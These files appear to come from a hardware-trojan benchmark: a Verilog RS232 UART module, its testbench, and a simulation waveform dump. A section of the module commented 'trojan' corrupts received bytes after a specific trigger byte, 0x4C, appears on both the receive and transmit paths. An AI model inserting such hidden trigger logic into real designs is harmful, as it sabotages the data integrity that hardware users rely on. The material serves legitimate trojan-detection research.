RTL/RS232-T400/uart_top.v
module uart_top (
    sys_clk,
    sys_rst_l,
    uart_XMIT_dataH,
    xmitH,
    xmit_dataH,
    xmit_doneH,

    uart_REC_dataH,
    rec_dataH,
    rec_readyH
);


  input sys_clk;
  input sys_rst_l;
  output uart_XMIT_dataH;
  input xmitH;
  input [7:0] xmit_dataH;
  output xmit_doneH;

  input uart_REC_dataH;
  output [7:0] rec_dataH;
  output rec_readyH;

  reg  [7:0] rec_dataH;
  reg  [7:0] rec_dataH_temp;
  reg        cntr;
  wire [7:0] rec_dataH_rec;
  // wire       rec_readyH;

  // xmit
  reg [2:0] next_state_xmit, state_xmit;
  reg    load_shiftRegH;
  reg    shiftEnaH;
  reg  [3:0] bitCell_cntrH;
  reg    countEnaH;
  reg  [7:0] xmit_ShiftRegH;
  reg  [3:0] bitCountH;
  reg    rst_bitCountH;
  reg    ena_bitCountH;
  reg  [1:0] xmitDataSelH;
  reg    uart_xmitH;
  reg    xmit_doneInH;
  reg    xmit_doneH;

  assign uart_XMIT_dataH = uart_xmitH;

  always @(xmit_ShiftRegH or xmitDataSelH) begin
    case (xmitDataSelH)
      2'b00: begin
          uart_xmitH = 1'b0;
          $display("1,0,1");
      end
      2'b01: begin
          uart_xmitH = 1'b1;
          $display("1,0,2");
      end
      2'b10: begin
          uart_xmitH = xmit_ShiftRegH[0];
          $display("1,0,3");
      end
      default: uart_xmitH = 1'bx;
    endcase
  end


  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) bitCell_cntrH <= 0;
    else if (countEnaH) bitCell_cntrH <= bitCell_cntrH + 1;
    else bitCell_cntrH <= 0;
  end



  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) xmit_ShiftRegH <= 0;
    else if (load_shiftRegH) xmit_ShiftRegH <= xmit_dataH;
    else if (shiftEnaH) begin
      xmit_ShiftRegH[6:0] <= xmit_ShiftRegH[7:1];
      xmit_ShiftRegH[7]   <= 1'b1;
    end else xmit_ShiftRegH <= xmit_ShiftRegH;
  end



  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) bitCountH <= 0;
    else if (rst_bitCountH) bitCountH <= 0;
    else if (ena_bitCountH) bitCountH <= bitCountH + 1;
  end


  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) state_xmit <= 3'b000;
    else state_xmit <= next_state_xmit;
  end


  always @(state_xmit or xmitH or bitCell_cntrH or bitCountH) begin

    next_state_xmit = state_xmit;
    load_shiftRegH  = 1'b0;
    countEnaH       = 1'b0;
    shiftEnaH       = 1'b0;
    rst_bitCountH   = 1'b0;
    ena_bitCountH   = 1'b0;
    xmitDataSelH    = 2'b01;
    xmit_doneInH    = 1'b0;

    case (state_xmit)

      3'b000: begin
        if (xmitH) begin
          next_state_xmit = 3'b010;
          load_shiftRegH  = 1'b1;
          bitCell_cntrH <= 0;
          bitCountH <= 0;
          xmit_ShiftRegH <= 0;
        end else begin
          next_state_xmit    = 3'b000;
          rst_bitCountH = 1'b1;
          xmit_doneInH  = 1'b1;
        end
      end



      3'b010: begin
        xmitDataSelH = 2'b00;
        if (bitCell_cntrH == 4'hF) next_state_xmit = 3'b011;
        else begin
          next_state_xmit = 3'b010;
          countEnaH = 1'b1;
        end
      end


      3'b011: begin
        xmitDataSelH = 2'b10;
        if (bitCell_cntrH == 4'hE) begin
          if (bitCountH == 8) next_state_xmit = 3'b101;
          else begin
            next_state_xmit = 3'b100;
            ena_bitCountH   = 1'b1;
          end
        end else begin
          next_state_xmit = 3'b011;
          countEnaH = 1'b1;
        end
      end



      3'b100: begin
        xmitDataSelH    = 2'b10;
        next_state_xmit = 3'b011;
        shiftEnaH  = 1'b1;
      end


      3'b101: begin
        xmitDataSelH = 2'b01;
        if (bitCell_cntrH == 4'hF) begin
          next_state_xmit = 3'b000;
          xmit_doneInH = 1'b1;
        end else begin
          next_state_xmit = 3'b101;
          countEnaH = 1'b1;
        end
      end



      default: begin
        next_state_xmit = 3'bxxx;
        load_shiftRegH  = 1'bx;
        countEnaH       = 1'bx;
        shiftEnaH       = 1'bx;
        rst_bitCountH   = 1'bx;
        ena_bitCountH   = 1'bx;
        xmitDataSelH    = 2'bxx;
        xmit_doneInH    = 1'bx;
      end

    endcase

  end


  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) xmit_doneH <= 0;
    else xmit_doneH <= xmit_doneInH;
  end


  // rec
  

  reg [2:0] next_state_rec, state_rec;
  reg rec_datH, rec_datSyncH;
  reg  [3:0] bitCell_cntrH_rec;
  reg    cntr_resetH;
  reg  [7:0] par_dataH;
  reg    shiftH;
  reg  [3:0] recd_bitCntrH;
  reg    countH;
  reg    rstCountH;
  reg    rec_readyH;
  reg    rec_readyInH;


  wire [7:0] rec_dataH_1;
  wire uart_dataH;
  assign rec_dataH_rec = rec_dataH_1;
  assign rec_dataH_1   = par_dataH;

  assign uart_dataH = uart_REC_dataH;

  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) begin
      rec_datSyncH <= 1;
      rec_datH     <= 1;
    end else begin
      rec_datSyncH <= uart_dataH;
      rec_datH     <= rec_datSyncH;
    end
  end


  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) bitCell_cntrH_rec <= 0;
    else if (cntr_resetH) bitCell_cntrH_rec <= 0;
    else bitCell_cntrH_rec <= bitCell_cntrH_rec + 1;
  end


  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) begin
      par_dataH <= 0;
      $display("13,1,1");
    end
    else if (shiftH) begin
      par_dataH <= {rec_datH, par_dataH[7:1]};
      $display("13,1,0,1");
    end
  end


  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) recd_bitCntrH <= 0;
    else if (countH) recd_bitCntrH <= recd_bitCntrH + 1;
    else if (rstCountH) recd_bitCntrH <= 0;
  end




  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) state_rec <= 3'b001;
    else state_rec <= next_state_rec;
  end


  always @(state_rec or rec_datH or bitCell_cntrH_rec or recd_bitCntrH) begin

    next_state_rec = state_rec;
    cntr_resetH    = 1'b1;
    shiftH         = 1'b0;
    countH         = 1'b0;
    rstCountH      = 1'b0;
    rec_readyInH   = 1'b0;

    case (state_rec)

      3'b001: begin
        if (~rec_datH) next_state_rec = 3'b010;
        else begin
          next_state_rec = 3'b001;
          rstCountH = 1'b1;
          rec_readyInH = 1'b1;
        end
      end

      3'b010: begin
        if (bitCell_cntrH_rec == 4'h4) begin
          if (~rec_datH) next_state_rec = 3'b011;

          else next_state_rec = 3'b001;
        end else begin
          next_state_rec = 3'b010;
          cntr_resetH = 1'b0;
        end
      end


      3'b011: begin
        if (bitCell_cntrH_rec == 4'hE) begin
          if (recd_bitCntrH == 8) next_state_rec = 3'b101;
          else begin
            next_state_rec = 3'b100;
          end
        end else begin
          next_state_rec = 3'b011;
          cntr_resetH = 1'b0;
        end
      end

      3'b100: begin
        shiftH = 1'b1;
        countH = 1'b1;
        next_state_rec = 3'b011;
      end


      3'b101: begin
        next_state_rec = 3'b001;
        rec_readyInH   = 1'b1;
      end

      default: begin
        next_state_rec = 3'bxxx;
        cntr_resetH    = 1'bx;
        shiftH         = 1'bx;
        countH         = 1'bx;
        rstCountH      = 1'bx;
        rec_readyInH   = 1'bx;

      end

    endcase


  end


  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) rec_readyH <= 0;
    else rec_readyH <= rec_readyInH;
  end



  // trojan

  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) begin
      rec_dataH = 0;
    end else begin
      rec_dataH = rec_dataH_temp;
    end
  end


  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) begin
      rec_dataH_temp <= 0;
    end else begin
      if (cntr == 0) rec_dataH_temp <= rec_dataH_rec;
      else rec_dataH_temp <= {3'b010, rec_dataH_rec[3:0], 1'b1};
    end
  end


  always @(posedge sys_clk or negedge sys_rst_l) begin
    if (~sys_rst_l) begin
      cntr <= 1'b0;
      $display("20,1,1");
    end else begin
      //  if((rec_dataH_rec==xmit_dataH)=={3'b010,3'b011,3'b100[1:0]})
      if ((rec_dataH_rec == xmit_dataH) && (rec_dataH_rec == 8'b01001100)) begin
        cntr <= 1'b1;
        $display("20,1,0,1");
      end else begin
        cntr <= 1'b0;
        $display("20,1,0,0");
      end
    end
  end



endmodule

RTL/RS232-T400/tb_uart_top.v
//~ `New testbench
`timescale  1ns / 1ps

module tb_uart_top;

// uart_top Parameters
parameter PERIOD  = 10;


// uart_top Inputs
reg   sys_clk                              = 0 ;
reg   sys_rst_l                            = 0 ;
reg   xmitH                                = 0 ;
reg   [7:0]  xmit_dataH                    = 0 ;
reg   uart_REC_dataH                       = 0 ;

// uart_top Outputs
wire  uart_XMIT_dataH                      ;
wire  xmit_doneH                           ;
wire  [7:0]  rec_dataH                     ;
wire  rec_readyH                           ;


initial
begin
    forever #(PERIOD/2)  sys_clk=~sys_clk;
end

initial
begin
    #(PERIOD*2) sys_rst_l  =  1;
end

uart_top  u_uart_top (
    .sys_clk                 ( sys_clk                ),
    .sys_rst_l               ( sys_rst_l              ),
    .xmitH                   ( xmitH                  ),
    .xmit_dataH              ( xmit_dataH       [7:0] ),
    .uart_REC_dataH          ( uart_REC_dataH         ),

    .uart_XMIT_dataH         ( uart_XMIT_dataH        ),
    .xmit_doneH              ( xmit_doneH             ),
    .rec_dataH               ( rec_dataH        [7:0] ),
    .rec_readyH              ( rec_readyH             )
);

integer i;
initial begin

    xmitH = 0;
    xmit_dataH = 0;
    uart_REC_dataH = 0;
    #10;
    for(i = 0; i < 100; i = i + 1) begin
        #8;

        xmitH = $random & 1'd1;
        xmit_dataH = $random & 8'd255;
        uart_REC_dataH = $random & 1'd1;
        #2;
    end

    $finish;
end

initial
begin            
    $dumpfile("wave.vcd");        //生成的vcd文件名称
    $dumpvars(0, tb_uart_top);    //tb模块名称
end 
endmodule

RTL/RS232-T400/wave.vcd
$date
	Thu Feb 20 21:26:07 2025
$end
$version
	Icarus Verilog
$end
$timescale
	1ps
$end
$scope module tb_uart_top $end
$var wire 1 ! xmit_doneH $end
$var wire 1 " uart_XMIT_dataH $end
$var wire 1 # rec_readyH $end
$var wire 8 $ rec_dataH [7:0] $end
$var parameter 32 % PERIOD $end
$var reg 1 & sys_clk $end
$var reg 1 ' sys_rst_l $end
$var reg 1 ( uart_REC_dataH $end
$var reg 1 ) xmitH $end
$var reg 8 * xmit_dataH [7:0] $end
$var integer 32 + i [31:0] $end
$scope module u_uart_top $end
$var wire 8 , rec_dataH_1 [7:0] $end
$var wire 8 - rec_dataH_rec [7:0] $end
$var wire 1 & sys_clk $end
$var wire 1 ' sys_rst_l $end
$var wire 1 ( uart_REC_dataH $end
$var wire 1 " uart_XMIT_dataH $end
$var wire 1 . uart_dataH $end
$var wire 1 ) xmitH $end
$var wire 8 / xmit_dataH [7:0] $end
$var reg 4 0 bitCell_cntrH [3:0] $end
$var reg 4 1 bitCell_cntrH_rec [3:0] $end
$var reg 4 2 bitCountH [3:0] $end
$var reg 1 3 cntr $end
$var reg 1 4 cntr_resetH $end
$var reg 1 5 countEnaH $end
$var reg 1 6 countH $end
$var reg 1 7 ena_bitCountH $end
$var reg 1 8 load_shiftRegH $end
$var reg 3 9 next_state_rec [2:0] $end
$var reg 3 : next_state_xmit [2:0] $end
$var reg 8 ; par_dataH [7:0] $end
$var reg 1 < rec_datH $end
$var reg 1 = rec_datSyncH $end
$var reg 8 > rec_dataH [7:0] $end
$var reg 8 ? rec_dataH_temp [7:0] $end
$var reg 1 # rec_readyH $end
$var reg 1 @ rec_readyInH $end
$var reg 4 A recd_bitCntrH [3:0] $end
$var reg 1 B rstCountH $end
$var reg 1 C rst_bitCountH $end
$var reg 1 D shiftEnaH $end
$var reg 1 E shiftH $end
$var reg 3 F state_rec [2:0] $end
$var reg 3 G state_xmit [2:0] $end
$var reg 1 H uart_xmitH $end
$var reg 2 I xmitDataSelH [1:0] $end
$var reg 8 J xmit_ShiftRegH [7:0] $end
$var reg 1 ! xmit_doneH $end
$var reg 1 K xmit_doneInH $end
$upscope $end
$upscope $end
$enddefinitions $end
$comment Show the parameter values. $end
$dumpall
b1010 %
$end
#0
$dumpvars
1K
b0 J
b1 I
1H
b0 G
b1 F
0E
0D
1C
1B
b0 A
1@
b0 ?
b0 >
1=
1<
b0 ;
b0 :
b1 9
08
07
06
05
14
03
b0 2
b0 1
b0 0
b0 /
0.
b0 -
b0 ,
bx +
b0 *
0)
0(
0'
0&
b0 $
0#
1"
0!
$end
#5000
1&
#10000
0&
b0 +
#15000
1&
#18000
1.
1(
b10000001 *
b10000001 /
#20000
b1 +
0&
1'
#25000
1#
1!
1&
#28000
18
b10 :
0K
0C
b1101 *
b1101 /
1)
#30000
b10 +
0&
#35000
0"
0H
15
b0 I
08
b1101 J
b10 G
0!
1&
#38000
b10010 *
b10010 /
#40000
b11 +
0&
#45000
b0 I
15
b1 0
1&
#48000
b1110110 *
b1110110 /
#50000
b100 +
0&
#55000
b0 I
15
b10 0
1&
#58000
b10001100 *
b10001100 /
#60000
b101 +
0&
#65000
b0 I
15
b11 0
1&
#68000
b0 I
15
0.
0(
b11000101 *
b11000101 /
0)
#70000
b110 +
0&
#75000
b0 I
15
b100 0
0=
1&
#78000
b0 I
15
b1110111 *
b1110111 /
1)
#80000
b111 +
0&
#85000
b10 9
0@
0B
b0 I
15
0<
b101 0
1&
#88000
b11110010 *
b11110010 /
#90000
b1000 +
0&
#95000
b0 I
15
04
b110 0
b10 F
0#
1&
#98000
b0 I
15
b11000101 *
b11000101 /
0)
#100000
b1001 +
0&
#105000
04
b0 I
15
b1 1
b111 0
1&
#108000
b0 I
15
1.
1(
b101101 *
b101101 /
1)
#110000
b1010 +
0&
#115000
b0 I
15
04
b1000 0
1=
b10 1
1&
#118000
0.
0(
b1010 *
b1010 /
#120000
b1011 +
0&
#125000
04
b0 I
15
b11 1
1<
0=
b1001 0
1&
#128000
b0 I
15
1.
1(
b10101010 *
b10101010 /
0)
#130000
b1100 +
0&
#135000
b0 I
15
b11 9
14
b1010 0
0<
1=
b100 1
1&
#138000
b10011 *
b10011 /
#140000
b1101 +
0&
#145000
04
b0 I
15
b11 F
b0 1
1<
b1011 0
1&
#148000
b0 I
15
b1101011 *
b1101011 /
1)
#150000
b1110 +
0&
#155000
b0 I
15
04
b1100 0
b1 1
1&
#158000
b0 I
15
b10101110 *
b10101110 /
0)
#160000
b1111 +
0&
#165000
04
b0 I
15
b10 1
b1101 0
1&
#168000
b0 I
15
0.
0(
b100011 *
b100011 /
1)
#170000
b10000 +
0&
#175000
b0 I
15
04
b1110 0
0=
b11 1
1&
#178000
b0 I
15
b111100 *
b111100 /
0)
#180000
b10001 +
0&
#185000
04
b11 :
b0 I
05
b100 1
0<
b1111 0
1&
#188000
b1000001 *
b1000001 /
#190000
b10010 +
0&
#195000
1"
1H
15
b10 I
04
b0 0
b11 G
b101 1
1&
#198000
1.
1(
b10001001 *
b10001001 /
#200000
b10011 +
0&
#205000
04
b10 I
15
b110 1
1=
b1 0
1&
#208000
0.
0(
b11000110 *
b11000110 /
#210000
b10100 +
0&
#215000
b10 I
15
04
b10 0
1<
0=
b111 1
1&
#218000
1.
1(
b101010 *
b101010 /
#220000
b10101 +
0&
#225000
04
b10 I
15
b1000 1
0<
1=
b11 0
1&
#228000
b10 I
15
b10000101 *
b10000101 /
1)
#230000
b10110 +
0&
#235000
b10 I
15
04
b100 0
1<
b1001 1
1&
#238000
0.
0(
b111010 *
b111010 /
#240000
b10111 +
0&
#245000
04
b10 I
15
b1010 1
0=
b101 0
1&
#248000
1.
1(
b11110001 *
b11110001 /
#250000
b11000 +
0&
#255000
b10 I
15
04
b110 0
0<
1=
b1011 1
1&
#258000
b10 I
15
b1001100 *
b1001100 /
0)
#260000
b11001 +
0&
#265000
04
b10 I
15
b1100 1
1<
b111 0
1&
#268000
b10 I
15
b11111000 *
b11111000 /
1)
#270000
b11010 +
0&
#275000
b10 I
15
04
b1000 0
b1101 1
1&
#278000
b1011100 *
b1011100 /
#280000
b11011 +
0&
#285000
b100 9
14
b10 I
15
b1110 1
b1001 0
1&
#288000
0.
0(
b1001001 *
b1001001 /
#290000
b11100 +
0&
#295000
b10 I
15
b11 9
16
1E
b1010 0
0=
b0 1
b100 F
1&
#298000
b1010001 *
b1010001 /
#300000
b11101 +
0&
#305000
04
06
0E
b10 I
15
b11 F
b1 A
b10000000 -
b10000000 ,
b10000000 ;
0<
b1011 0
1&
#308000
b10 I
15
b11000010 *
b11000010 /
0)
#310000
b11110 +
0&
#315000
b10 I
15
04
b1100 0
b1 1
b10000000 ?
1&
#318000
b10 I
15
b111101 *
b111101 /
1)
#320000
b11111 +
0&
#325000
04
b10 I
15
b10 1
b1101 0
b10000000 $
b10000000 >
1&
#328000
b10 I
15
1.
1(
b1101101 *
b1101101 /
0)
#330000
b100000 +
0&
#335000
17
b100 :
b10 I
05
04
b1110 0
1=
b11 1
1&
#338000
b10 I
17
b100 :
b11010011 *
b11010011 /
1)
#340000
b100001 +
0&
#345000
04
1D
b11 :
b10 I
07
b100 1
1<
b100 G
b1 2
b0 0
1&
#348000
b10 I
1D
b11 :
b1011011 *
b1011011 /
0)
#350000
b100010 +
0&
#355000
0"
0H
15
b10 I
0D
04
b10000110 J
b11 G
b101 1
1&
#358000
b10 I
15
0.
0(
b101010 *
b101010 /
1)
#360000
b100011 +
0&
#365000
04
b10 I
15
b110 1
0=
b1 0
1&
#368000
b10 I
15
b10001110 *
b10001110 /
0)
#370000
b100100 +
0&
#375000
b10 I
15
04
b10 0
0<
b111 1
1&
#378000
1.
1(
b100110 *
b100110 /
#380000
b100101 +
0&
#385000
04
b10 I
15
b1000 1
1=
b11 0
1&
#388000
b10 I
15
b101111 *
b101111 /
1)
#390000
b100110 +
0&
#395000
b10 I
15
04
b100 0
1<
b1001 1
1&
#398000
b1000100 *
b1000100 /
#400000
b100111 +
0&
#405000
04
b10 I
15
b1010 1
b101 0
1&
#408000
0.
0(
b11100110 *
b11100110 /
#410000
b101000 +
0&
#415000
b10 I
15
04
b110 0
0=
b1011 1
1&
#418000
b11101101 *
b11101101 /
#420000
b101001 +
0&
#425000
04
b10 I
15
b1100 1
0<
b111 0
1&
#428000
1.
1(
b10110101 *
b10110101 /
#430000
b101010 +
0&
#435000
b10 I
15
04
b1000 0
1=
b1101 1
1&
#438000
0.
0(
b1000100 *
b1000100 /
#440000
b101011 +
0&
#445000
b100 9
14
b10 I
15
b1110 1
1<
0=
b1001 0
1&
#448000
b10 I
15
b10101011 *
b10101011 /
0)
#450000
b101100 +
0&
#455000
b10 I
15
b11 9
16
1E
b1010 0
0<
b0 1
b100 F
1&
#458000
1.
1(
b10011010 *
b10011010 /
#460000
b101101 +
0&
#465000
04
06
0E
b10 I
15
b11 F
b10 A
b1000000 -
b1000000 ,
b1000000 ;
1=
b1011 0
1&
#468000
b10 I
15
0.
0(
b1010110 *
b1010110 /
1)
#470000
b101110 +
0&
#475000
b10 I
15
04
b1100 0
1<
0=
b1 1
b1000000 ?
1&
#478000
b1010 *
b1010 /
#480000
b101111 +
0&
#485000
04
b10 I
15
b10 1
0<
b1101 0
b1000000 $
b1000000 >
1&
#488000
b10 I
15
b1111001 *
b1111001 /
0)
#490000
b110000 +
0&
#495000
17
b100 :
b10 I
05
04
b1110 0
b11 1
1&
#498000
b10010011 *
b10010011 /
#500000
b110001 +
0&
#505000
04
1D
b11 :
b10 I
07
b100 1
b100 G
b10 2
b0 0
1&
#508000
b10 I
1D
b11 :
1.
1(
b11011011 *
b11011011 /
1)
#510000
b110010 +
0&
#515000
1"
1H
15
b10 I
0D
04
b11000011 J
b11 G
1=
b101 1
1&
#518000
0.
0(
b1101101 *
b1101101 /
#520000
b110011 +
0&
#525000
04
b10 I
15
b110 1
1<
0=
b1 0
1&
#528000
b10 I
15
1.
1(
b10110110 *
b10110110 /
0)
#530000
b110100 +
0&
#535000
b10 I
15
04
b10 0
0<
1=
b111 1
1&
#538000
b100 *
b100 /
#540000
b110101 +
0&
#545000
04
b10 I
15
b1000 1
1<
b11 0
1&
#548000
b10 I
15
0.
0(
b10110100 *
b10110100 /
1)
#550000
b110110 +
0&
#555000
b10 I
15
04
b100 0
0=
b1001 1
1&
#558000
b10 I
15
1.
1(
b101101 *
b101101 /
0)
#560000
b110111 +
0&
#565000
04
b10 I
15
b1010 1
0<
1=
b101 0
1&
#568000
0.
0(
b1000 *
b1000 /
#570000
b111000 +
0&
#575000
b10 I
15
04
b110 0
1<
0=
b1011 1
1&
#578000
b10 I
15
b101001 *
b101001 /
1)
#580000
b111001 +
0&
#585000
04
b10 I
15
b1100 1
0<
b111 0
1&
#588000
b10 I
15
1.
1(
b11011010 *
b11011010 /
0)
#590000
b111010 +
0&
#595000
b10 I
15
04
b1000 0
1=
b1101 1
1&
#598000
b1110000 *
b1110000 /
#600000
b111011 +
0&
#605000
b100 9
14
b10 I
15
b1110 1
1<
b1001 0
1&
#608000
0.
0(
b1011110 *
b1011110 /
#610000
b111100 +
0&
#615000
b10 I
15
b11 9
16
1E
b1010 0
0=
b0 1
b100 F
1&
#618000
b10 I
15
1.
1(
b11010 *
b11010 /
1)
#620000
b111101 +
0&
#625000
04
06
0E
b10 I
15
b11 F
b11 A
b10100000 -
b10100000 ,
b10100000 ;
0<
1=
b1011 0
1&
#628000
0.
0(
b10010110 *
b10010110 /
#630000
b111110 +
0&
#635000
b10 I
15
04
b1100 0
1<
0=
b1 1
b10100000 ?
1&
#638000
b10 I
15
1.
1(
b10110110 *
b10110110 /
0)
#640000
b111111 +
0&
#645000
04
b10 I
15
b10 1
0<
1=
b1101 0
b10100000 $
b10100000 >
1&
#648000
0.
0(
b10000110 *
b10000110 /
#650000
b1000000 +
0&
#655000
17
b100 :
b10 I
05
04
b1110 0
1<
0=
b11 1
1&
#658000
1.
1(
b11011011 *
b11011011 /
#660000
b1000001 +
0&
#665000
04
1D
b11 :
b10 I
07
b100 1
0<
1=
b100 G
b11 2
b0 0
1&
#668000
b10 I
1D
b11 :
b11111010 *
b11111010 /
1)
#670000
b1000010 +
0&
#675000
15
b10 I
0D
04
b11100001 J
b11 G
1<
b101 1
1&
#678000
0.
0(
b10100001 *
b10100001 /
#680000
b1000011 +
0&
#685000
04
b10 I
15
b110 1
0=
b1 0
1&
#688000
b10 I
15
1.
1(
b11110101 *
b11110101 /
0)
#690000
b1000100 +
0&
#695000
b10 I
15
04
b10 0
0<
1=
b111 1
1&
#698000
b10 I
15
b11000001 *
b11000001 /
1)
#700000
b1000101 +
0&
#705000
04
b10 I
15
b1000 1
1<
b11 0
1&
#708000
b10 I
15
b1001011 *
b1001011 /
0)
#710000
b1000110 +
0&
#715000
b10 I
15
04
b100 0
b1001 1
1&
#718000
0.
0(
b10001010 *
b10001010 /
#720000
b1000111 +
0&
#725000
04
b10 I
15
b1010 1
0=
b101 0
1&
#728000
1.
1(
b10101001 *
b10101001 /
#730000
b1001000 +
0&
#735000
b10 I
15
04
b110 0
0<
1=
b1011 1
1&
#738000
b11100110 *
b11100110 /
#740000
b1001001 +
0&
#745000
04
b10 I
15
b1100 1
1<
b111 0
1&
#748000
b101010 *
b101010 /
#750000
b1001010 +
0&
#755000
b10 I
15
04
b1000 0
b1101 1
1&
#758000
b111000 *
b111000 /
#760000
b1001011 +
0&
#765000
b100 9
14
b10 I
15
b1110 1
b1001 0
1&
#768000
b11001010 *
b11001010 /
#770000
b1001100 +
0&
#775000
b10 I
15
b11 9
16
1E
b1010 0
b0 1
b100 F
1&
#778000
b10 I
15
0.
0(
b11000111 *
b11000111 /
1)
#780000
b1001101 +
0&
#785000
04
06
0E
b10 I
15
b11 F
b100 A
b11010000 -
b11010000 ,
b11010000 ;
0=
b1011 0
1&
#788000
b10 I
15
1.
1(
b11000100 *
b11000100 /
0)
#790000
b1001110 +
0&
#795000
b10 I
15
04
b1100 0
0<
1=
b1 1
b11010000 ?
1&
#798000
b10110100 *
b10110100 /
#800000
b1001111 +
0&
#805000
04
b10 I
15
b10 1
1<
b1101 0
b11010000 $
b11010000 >
1&
#808000
0.
0(
b11111010 *
b11111010 /
#810000
b1010000 +
0&
#815000
17
b100 :
b10 I
05
04
b1110 0
0=
b11 1
1&
#818000
b10111101 *
b10111101 /
#820000
b1010001 +
0&
#825000
04
1D
b11 :
b10 I
07
b100 1
0<
b100 G
b100 2
b0 0
1&
#828000
1.
1(
b11001010 *
b11001010 /
#830000
b1010010 +
0&
#835000
0"
0H
15
b10 I
0D
04
b11110000 J
b11 G
1=
b101 1
1&
#838000
b10 I
15
b10001110 *
b10001110 /
1)
#840000
b1010011 +
0&
#845000
04
b10 I
15
b110 1
1<
b1 0
1&
#848000
b11101111 *
b11101111 /
#850000
b1010100 +
0&
#855000
b10 I
15
04
b10 0
b111 1
1&
#858000
b10 I
15
b1110101 *
b1110101 /
0)
#860000
b1010101 +
0&
#865000
04
b10 I
15
b1000 1
b11 0
1&
#868000
b10 I
15
0.
0(
b10001000 *
b10001000 /
1)
#870000
b1010110 +
0&
#875000
b10 I
15
04
b100 0
0=
b1001 1
1&
#878000
b10010010 *
b10010010 /
#880000
b1010111 +
0&
#885000
04
b10 I
15
b1010 1
0<
b101 0
1&
#888000
b1001011 *
b1001011 /
#890000
b1011000 +
0&
#895000
b10 I
15
04
b110 0
b1011 1
1&
#898000
b10 I
15
b1101 *
b1101 /
0)
#900000
b1011001 +
0&
#905000
04
b10 I
15
b1100 1
b111 0
1&
#908000
b11010001 *
b11010001 /
#910000
b1011010 +
0&
#915000
b10 I
15
04
b1000 0
b1101 1
1&
#918000
b10 I
15
b111011 *
b111011 /
1)
#920000
b1011011 +
0&
#925000
b100 9
14
b10 I
15
b1110 1
b1001 0
1&
#928000
1.
1(
b1010110 *
b1010110 /
#930000
b1011100 +
0&
#935000
b10 I
15
b11 9
16
1E
b1010 0
1=
b0 1
b100 F
1&
#938000
b10 I
15
b100 *
b100 /
0)
#940000
b1011101 +
0&
#945000
04
06
0E
b10 I
15
b11 F
b101 A
b1101000 -
b1101000 ,
b1101000 ;
1<
b1011 0
1&
#948000
0.
0(
b10010 *
b10010 /
#950000
b1011110 +
0&
#955000
b10 I
15
04
b1100 0
0=
b1 1
b1101000 ?
1&
#958000
b10 I
15
1.
1(
b11100101 *
b11100101 /
1)
#960000
b1011111 +
0&
#965000
04
b10 I
15
b10 1
0<
1=
b1101 0
b1101000 $
b1101000 >
1&
#968000
0.
0(
b10000001 *
b10000001 /
#970000
b1100000 +
0&
#975000
17
b100 :
b10 I
05
04
b1110 0
1<
0=
b11 1
1&
#978000
1.
1(
b10100001 *
b10100001 /
#980000
b1100001 +
0&
#985000
04
1D
b11 :
b10 I
07
b100 1
0<
1=
b100 G
b101 2
b0 0
1&
#988000
b10 I
1D
b11 :
0.
0(
b1011000 *
b1011000 /
0)
#990000
b1100010 +
0&
#995000
15
b10 I
0D
04
b11111000 J
b11 G
1<
0=
b101 1
1&
#998000
b10010 *
b10010 /
#1000000
b1100011 +
0&
#1005000
04
b10 I
15
b110 1
0<
b1 0
1&
#1008000
b10 I
15
1.
1(
b1010101 *
b1010101 /
1)
#1010000
b1100100 +
0&
